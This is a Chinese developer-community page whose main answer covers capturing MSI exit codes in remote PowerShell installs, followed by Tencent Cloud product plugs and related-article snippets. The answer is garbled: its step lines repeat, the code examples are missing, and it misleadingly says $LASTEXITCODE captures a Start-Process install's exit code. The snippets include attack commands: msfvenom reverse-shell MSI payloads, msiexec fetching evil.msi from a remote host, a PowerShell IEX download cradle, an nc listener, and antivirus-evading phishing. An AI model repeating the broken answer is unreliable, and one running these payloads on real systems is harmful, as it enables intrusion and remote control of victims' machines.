开发者社区

文档建议反馈控制台

最新优惠活动

文章/答案/技术大牛

发布

使用PowerShell远程安装时获取MSI退出代码

PowerShell是一种跨平台的脚本语言和命令行工具，用于自动化任务和配置管理。它在Windows操作系统中广泛使用，并且可以通过远程连接来执行命令和脚本。

在使用PowerShell进行远程安装时，获取MSI退出代码是一种常见的需求。MSI退出代码是指在安装或卸载MSI（Microsoft Installer）软件包时，安装程序返回的代码。这个代码可以帮助我们判断安装是否成功或失败，并采取相应的措施。

要获取MSI退出代码，可以使用PowerShell中的$LASTEXITCODE变量。这个变量保存了上一个执行的命令或脚本的退出代码。在安装MSI软件包后，可以通过以下步骤获取退出代码：

使用Start-Process命令执行MSI安装程序，例如：
使用Start-Process命令执行MSI安装程序，例如：
检查$LASTEXITCODE变量的值，例如：
检查$LASTEXITCODE变量的值，例如：

这样，你就可以根据MSI退出代码来判断安装是否成功，并根据需要执行后续操作。

在腾讯云中，可以使用云服务器（CVM）来进行远程安装和管理。腾讯云提供了一系列与云服务器相关的产品，例如：

云服务器（CVM）：提供了多种规格和配置的虚拟机实例，可用于部署和运行应用程序。
- 产品介绍链接：https://cloud.tencent.com/product/cvm
云监控（Cloud Monitor）：用于监控云服务器的性能指标和运行状态，可以及时发现和解决问题。
- 产品介绍链接：https://cloud.tencent.com/product/monitor
云安全中心（Cloud Security Center）：提供了多层次的安全防护和威胁检测，保护云服务器和应用程序的安全。
- 产品介绍链接：https://cloud.tencent.com/product/ssc

请注意，以上只是腾讯云提供的一些与云服务器相关的产品，还有其他产品可以根据具体需求选择和使用。

总结：使用PowerShell远程安装时获取MSI退出代码可以通过$LASTEXITCODE变量来实现。腾讯云提供了云服务器等相关产品，可用于远程安装和管理应用程序。

相关搜索:MSI安装程序抛出退出代码3010，无法修复它。需要帮助 npm安装远程存储库:获取失败，状态代码为401 PyQt5 -使用QSortFilterProxyModel时退出代码3 --> filterAcceptsRow 从GCP获取数据时，Docker Container退出，代码为247 从jar获取退出代码时出现问题从powershell运行msi时指定完整安装选项使用PIP安装Spacy时出错-退出状态1 使用powershell在远程主机上安装MSI 使用PowerShell调用可视生成时在PowerShell中获取$LastExitCode 使用SecurityContext readOnlyRootFilesystem时的Kubernetes 137退出代码

相关搜索:

页面内容是否对你有帮助？

有帮助

没帮助

相关·内容

Windows 7中安装contextify时遇到的错误：`gyp` 退出代码为2

所以说，当我们遇到gyp 退出代码为 2的错误信息时，可以向下面几个步骤一样去做处理。...1、问题背景在 Windows 7 系统中，使用 npm 命令安装 contextify 时，出现了错误：gyp 退出代码为 2。...not ok code 02、解决方案1）安装 node-gyp使用 npm 命令全局安装 node-gyp：npm install -g node-gyp2）检查 Python 版本根据错误信息，需要确保系统中安装了...3）重新安装 contextify在安装好 node-gyp 和 Python 2.7 后，可以重新安装 contextify：npm install contextify代码例子// 安装 node-gypnpm...以上的解决方法是很详细的，所以我们在安装过程中，尝试查看安装日志以获取更多详细信息，以便找出具体的错误原因。通常，安装过程中会生成日志文件，你可以在其中查找相关的错误信息。

1101 0

如何获得PowerShell命令的历史记录

的命令的历史记录有两种方式，分别柯林斯使用Get-History状语从句：Get-PSReadlineOption读取 1，获取-历史参考文档：https://docs.microsoft.com/en-us...view=powershell-3.0 默认Powershell v2及以上支持能够记录当前会话中输入的命令，多个PowerShell的进程之间不共享，Powershell的进程退出后自动清除所有记录。...view=powershell-5.1 默认Powershell v5支持Powershell v3和Powershell v4，需要安装Get-PSReadlineOption后才可以使用。...Powershell v3和Powershell v4的安装和使用这里以64位系统为例，安装方法如下：（1）安装PowerShellGet 下载：https://www.microsoft.com/...id=51451 注：安装前需要关闭的PowerShell进程可以通过命令行实现隐蔽安装，命令如下： msiexec /q /i PackageManagement_x64.msi 安装成功后，在控制面板的已安装程序列表

12.7K3 0

绕过360进行Word文档钓鱼

安装完Wix工具后执行下列前两条命令，会在同目录下生成一个calc.msi文件，最后一条命令表示远程下载并利用msiexec运行calc.msi文件。...首先配置好empire，具体的配置内容可以参考这篇文章[https://mari0er.club/post/empire.html],之后将生成的powershell代码复制粘贴到wix模板的第15行，...替换之前打开计算器的代码，然后,用第二步的方法制作成msi文件，最后利用RTF脚本生成doc文件。...此时打开Word文档就会远程执行下载和安装msi木马的命令，进一步运行powershell进行反弹。...这里说一下，经过我的测试发现，直接利用RTF脚本运行命令，在360存在的情况下一定会弹窗，但通过msi安装文件却不会，其次RTF脚本 -c 参数有109字节数限制。

2.5K5 0

1.Powershell基础入门介绍与安装升级

Windows 安装方式描述: 若要在 Windows 上安装 PowerShell，请从 GitHub 下载最新安装包： PowerShell-7.1.3-win-x64.msi PowerShell...7.1 开始，MSI 包将创建用于存储 PowerShell 安装位置和版本的注册表项。...安装方式: 安装 MSI 包 : 下载后双击安装程序并按照提示进行操作。 1.安装程序在 Windows“开始”菜单中创建一个快捷方式。...# 如果需要基于 WSMan 的远程处理，请按照说明使用[“另一种实例技术”][]创建远程处理终结点。...Server 1.在容器中使用 PowerShell docker run -it mcr.microsoft.com/powershell 2.在不再需要映像时将其删除 docker rmi mcr.microsoft.com

6.9K2 0

红队技巧-常规横向手法

admin$（打了kb2871997情况下）共享,建立IP超链接后可以不指定用户名和密码,不能仅拷贝文件不执行，拷贝时可以建立ipc连接后拷贝在启动psexec建立连接后，远程系统上会被安装psexecsvc...3.WMI会建立一个共享文件夹，用于远程读取命令执行结果。 4.当用户输入命令时，WMI创建进程执行该命令，然后把结果输出到文件，这个文件位于之前创建的共享文件夹中。...5.通过FSO组件访问远程共享文件夹中的结果文件，将结果输出。 6.当结果读取完成时，调用WMI执行命令删除结果文件，最后当WMIEXEC退出时，删除文件共享。...hash，直接wce注入到当前内存就行还可以通过生成恶意的msi文件，通过共享上传到目标机器，然后安装 net use \\\192.168.1.105\c$ /user:administrator@...在powershell中我们可以使用 get-CimInstance来列出本地COM程序列表远程DCOM对象的实例表现如下：客户端计算机从远程计算机请求实例化由CLSID表示的对象。

2K2 0

域渗透-横向移动命令总结

测试人员可以利用WMI提供的管理功能，通过已获取的用户凭据，与本地或远程主机进行交互，并控制其执行各种行为。...MSI; 二是远程部署WMI事件订阅，在特定条的事件发生时触发攻击。...MSI文件通过调用Win32 Product.Install方法，可以控制远程主机安装恶意的MSI(Microsoft Installer)文件，从而获取其权限。...①使用Metasploit生成一个恶意的MSI文件： msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.26.20 LPORT=..." 控制远程主机（10.10.10.19)，通过UNC路径进行远程加载测试人员服务器的MSI文件并进行安装，可以获取远程主机的权限常见工具 impacket wmiexec.py **前提：**主机开启

2.2K1 0

红队测试之Windows提权小结

将目标机器的systeminfo命令的结果输出并保存，使用wesng进行检查。 ? 发现只安装3个补丁，可以查看输出结果来找对应的漏洞利用代码。 ?...3.下载https://www.exploit-db.com/exploits/39719里面的漏洞利用使用powershell下载漏洞利用代码并执行 Powershell IEX (New-Object...这些服务可以在计算机启动时自动启动，可以暂停和重新启动而且不显示任何用户界面。这种服务非常适合在服务器上使用，或任何时候，为了不影响在同一台计算机上工作的其他用户，需要长时间运行功能时使用。...首先使用powershell加载powerup.ps1，需要在powerup.ps1结尾中加入InvokeAllchecks或者使用powershell执行时加载，执行如下代码： Powershell...安装msi，获取反弹shell。 msiexec /quiet /qn /i C:\Windows\Temp\1.msi ?

1K2 0

无文件落地攻击

PowerShell cmdlet旨在处理对象，对象是结构化信息，不仅仅是屏幕上出现的字符串，命令输出会始终包含你在需要时可使用的额外信息，如果以前使用过文本处理工具来处理数据，那么在PowerShell...中使用时，会发现它们的行为有所不同，在大多数情况下，不需要文本或文本处理工具来提取特定信息，可以使用标准PowerShell对象语法直接访问数据的各部分。...msiexec msiexec.exe属于系统进程，是Windows Installer的一部分，用于安装Windows Installer安装包(MSI)，对系统的正常运行非常重要，一般在运行Microsoft...Update安装更新或安装部分软件的时候出现，占用内存比较大，我们亦可以使用其作为无文件落地的媒介，下面举例说明： Step 1：使用Msfvenom构造一个恶意的msi程序 msfvenom -p...Step 2：使用python开启一个简易的web服务器用于托管msi载荷 ? Step 3：在攻击主机上使用nc监听端口 nc -lvp 6666 ?

1.9K4 0

powershell自动化重装 cloudbase-init 为1.1.2版本

、2012R2系统防火墙默认不拦截，用这3句就可以自动化重装cloudbase-init 如果有第三方安全软件，建议放行C:\Windows\SysWOW64\certutil.exe，同时在执行如下代码时还需退出所有会话里的第三方安全软件...（比如当前会话里的360你退出了，但其他的会话里有360，你在当前会话里执行代码还是会被360拦截） Set-ExecutionPolicy Unrestricted -force Set-executionpolicy...','c:\7z2200-x64.msi') msiexec.exe /i c:\7z2200-x64.msi /qn Start-Sleep 30 del c:\7z2200-x64.msi 2>$...','c:\7z2200-x64.msi') msiexec.exe /i c:\7z2200-x64.msi /qn Start-Sleep 30 del c:\7z2200-x64.msi 2>$...\cloudbase-init模式运行，可能导致密码成为1或随机密码）如果安装虚拟化驱动、安装cloudbase-init都能全自动化完成并且完成后自动关机，这样很方便做镜像，分享powershell

1.8K4 0

通过命令下载执行恶意代码的几种姿势

在目标主机执行恶意代码，可以分为上传/下载并执行恶意代码和无文件远程恶意代码执行。接下来，我们来总结一下Linux和Windows中下载和执行恶意代码的一些姿势。...rsync -av x.x.x.x:/tmp/passwd.txt /tmp/passwd.txt 06、sftp 使用sftp下载远程服务器上的文件。...Powershell 利用powershell远程执行ps1脚本。...XSL文件： wmic os get /FORMAT:"http://192.168.28.128/evil.xsl" 07、msiexec 用于安装Windows Installer安装包，可远程执行...msi文件。

2K2 0

Windows文件下载执行的15种姿势

','evil.exe') 远程执行命令： powershell -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http...4、wget Windows环境下，可上传免安装的可执行程序wget.exe到目标机器，使用wget下载文件。...9、msiexec msiexec 支持远程下载功能，将msi文件上传到服务器，通过如下命令远程执行： #生成msi包 msfvenom -p windows/exec CMD='net user test.../add' -f msi > evil.msi #远程执行 msiexec /q /i http://192.168.28.128/evil.msi 成功添加了一个test用户： ?...步骤二：通过url访问，可以查看恶意代码。 ? 复制代码如下： rundll32.exe javascript:"\..

3.2K1 1

WindowsLinux文件下载方式汇总

Python Python是目前很受欢迎的主流脚本语言，当目标主机内安装了python时，我们可以在cmd中使用python来实现远程文件下载： Type "help", "copyright",...如果目标主机有安装notpad那么你可以通过下面这种方式快速的从一个URL或者UNC路径当中下载文件到本地并执行来获取shell：首先，打开notpad++，之后点击"文件—>打开"： ?...Ruby 当目标主机内安装了Ruby时，我们可以在终端使用vim来编辑一个Ruby脚本，之后执行Ruby来实现远程文件下载： #!ruby #!...PHP 当目标主机内安装了Ruby时，我们可以在终端使用vim来编辑一个PHP脚本，之后执行PHP来实现远程文件下载： <?...Python Python是目前很受欢迎的主流脚本语言，当目标主机内安装了python时，我们可以在shell中使用python来实现远程文件下载： Type "help", "copyright",

1.8K5 0

Windows提权的几种常用姿势

---- 1、内核溢出漏洞提权由于目标系统没有及时安装补丁，攻击者可以利用Windows系统内核溢出漏洞进行提权，轻易获取system权限。...windows允许低权限用户以System权限运行安装文件。...如果启用此策略设置项，那么任何权限用户都能以NT AUTHORITY\SYSTEM权限来安装恶意的MSI(Microsoft Windows Installer)文件。...当域管理员通过组策略修改密码时，在脚本中引入用户密码，就可能导致安全问题。（1）访问SYSVOL共享文件夹，搜索包含“cpassword”的XML文件，获取AES加密的密码。 ?...6、令牌窃取提权通过窃取令牌获取管理员权限，在MSF中，可以使用incognito实现token窃取。

1.5K2 0

Windows 权限提升

安装程序，提示要添加的用户msiexec.exe /qn /i UserAdd.msi#/qn 安装过程中没有用户界面#/i 正常安装#/quiet 静默安装 #我这里没用虽然我加了参数，安装过程中仍然弹出了...： MSI Wrapper Advanced Installer @三好学生提到的其他思路 msiexec支持从远程加载，例如这样msiexec /q /i http://10.10.10.128/UserAdd.msi...笔者的答案是代码复用。使用 DLL 有助于促进代码的模块化、代码重用、内存的有效使用和减少所占用的磁盘空间。因此，操作系统和程序能够更快地加载和运行，并且在计算机中占用较少的磁盘空间。...LocalGPO.msi,在安装目录下使用管理员权限执行cscript LocalGPO.wsf /ConfigSCE即刻显示该设置。...(机翻的，大致意思懂就行) 如果应用程序时安装程序则时另外一回事了。

3.5K2 0

干货 | 红队和漏洞挖掘中那些关于”文档“的妙用（上）

比如说近期的CVE-2021-40444 Office Word远程代码执行漏洞。...如果你要找这些漏洞学习，有个搜索技巧，直接搜office CVE就可以找到这些漏洞 0x03 使用Excel文档进行钓鱼的若干姿势 1.Excel文档远程加载msi文件钓鱼 Excel文档与Word文档一样...，都是支持宏功能的，因此我们也可以用Excel文档进行钓鱼，不过，使用Excel文档进行钓鱼需要使用Metasploit生成一个恶意msi文件首先我们需要用MSF生成一个恶意msi文件，在msf中我们使用如下命令生成.../test.msi 我们将刚刚生成好的test.msi放到远程服务器上（同前文对dotm的操作一样），记录其地址完成上述操作之后我们新建一个Excel文档，选中一个单元格，右键-插入选择插入宏表（...，HALT是Excel文档代码的退出代码，不加容易报错）为了用户能够在打开Excel文档时自动执行我们的恶意代码，我们要选中这个EXEC代码所在的框框，然后把它的类型改成Auto_Open 接着我们右键恶意代码

1.2K5 0

苦象组织近期网络攻击活动及泄露武器分析

VT**检测结果** 16/59 快捷方式被点击运行后，会执行一段Powershell命令： ?...这段Powershell负责加载运行原快捷方式的Description结构值，这个值以分号填充了多个无实际作用的字符串，最终执行的静默安装远程的恶意程序MsAulis.msi： ?...图 2-4 样本静态解析 MSI安装包MsAulis.msi包含木马程序MsAulis.exe，深入分析发现，MsAulis.exe属于已知的苦象组织特有.NET远控插件的最新版。...打包后的winsce winsce 远控Loader程序 MsAulis.msi 打包后的rkftl rkftl 新版MSAService类插件 putty.php 获取putty.msi putty.msi...打包后的官方Puttty程序 MSAServices MSAService类插件 dlhost audiodq类插件 logs.php 用于获取MsAulis.msi，已删除除了打包的快捷方式，近期也有苦象组织常用的自解压诱饵

2K3 0

内网渗透基石篇--权限提升

@ -o /root/msi.msi msiexec /quiet /qn /i d:\msi.msi # /quiet 安装过程中禁止向用户发送消息 # /qn 不使用GUI # /i 安装程序...4 自动安装配置文件网络管理员在内网中给多台机器配置同一个环境时，通常不会逐台配置，而会使用脚本化批量部署的方法。在这一过程中，会使用安装配置条件。...sysvol文件夹是在安装活动目录时自动创建的，主要用来存放登陆脚本、组策略数据、其他域控制器需要的域信息。...3.获取组策略的凭据 1.手动查找浏览SysVQL文件夹，获取相关文件 ? 也可以使用type命令搜索。...2.使用powershell获取cpassword 下载地址： https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/

1.6K6 0

Mimikatz的18种免杀姿势及防御策略

安装vmp加壳软件后，使用vmp进行加壳 ? 使用sigthief.py对上一步生成的exe文件进行签名。...所以，最后是把相关代码放在自己的vps上，我就直接放我的内网另外的pc上了。 powershell依旧会被360行为拦截。 ?...方法6-C程序中执行powershell(VT查杀率7/71) 这个执行方式也是比较简单，在C代码里执行powershell。...方法2-Debug 权限 Mimikatz在获取密码时需要有本地管理员权限，因为它需要与lsass进程所交互，需要有调试权限来调试进程，默认情况下本地管理员拥有调试权限，但是这个权限一般情况是很少用得到的...3、针对powershell来加载或执行mimikatz时，免杀主要针对powershell脚本，免杀效果也很好，不过你在目标机器上怎么执行powershell而不触发杀软行为检测是个问题。

2.8K2 0

权限提升分析及防御

，如果启用此策略设置项，那么任何权限的用户都能以System权限来安装MSI文件，不过需要开启了Windows installer特权安装功能才能有效果 Windows Installer是Windows...操作系统的组件之一，专门用来管理和配置软件服务，其分为客户端安装服务（Msiexec.exe）和MSI文件两部分。...Windows Installer通过Msiexec.exe安装MSI文件包含的程序，双击MSI文件就会运行Msiexec.exe。...CreateProcess函数创建进程时对第二个参数中的文件路径没有使用双引号括起来，可以参考这个文档：Windows可信任路径代码执行漏洞利用方法查找漏洞存在的方法： //列出目标机器中所有没有被引号引起来的服务的路径...AD时自动创建主要用来存放登陆脚本、组策略数据及其他域控制器需要的域信息等为了方便地对所有的机器进行操作，网络管理员往往会使用组策略进行统一的配置和管理。

1.4K2 0

【玩转腾讯云】购买Windows CVM时自动安装Chrome、Firefox浏览器

> 前后那对标签就不说了，参考官网文档https://cloud.tencent.com/document/product/213/17526 4句代码...第1句：指定路径第2句：下载第3句：安装第4句：删除举一反三，我们也可以按照同样办法在新购Windows CVM时自动安装Firefox浏览器【Firefox】安装文件下载地址：https...://www.mozilla.org/en-US/firefox/all/#product-desktop-release Firefox有.msi和.exe两种安装包，对应两种安装方式 .msi方式...Chrome、Firefox并设置重启后自动登录（注意代码里的密码改成自己的密码），示例代码仅供参考 Set-ExecutionPolicy -Scope CurrentUser...> 自定义数据明文代码安装Chrome、Firefox并设置重启后自动登录、自动安装IIS，示例代码仅供参考：其实就是在上面的代码里加了一句话 Get-WindowsFeature -Name NET

2.3K4 0

点击加载更多

扫码

添加站长进交流群

领取专属 10元无门槛券

手把手带您无忧上云

扫码加入开发者社群

相关资讯

热门标签

活动推荐

运营活动

活动名称

广告关闭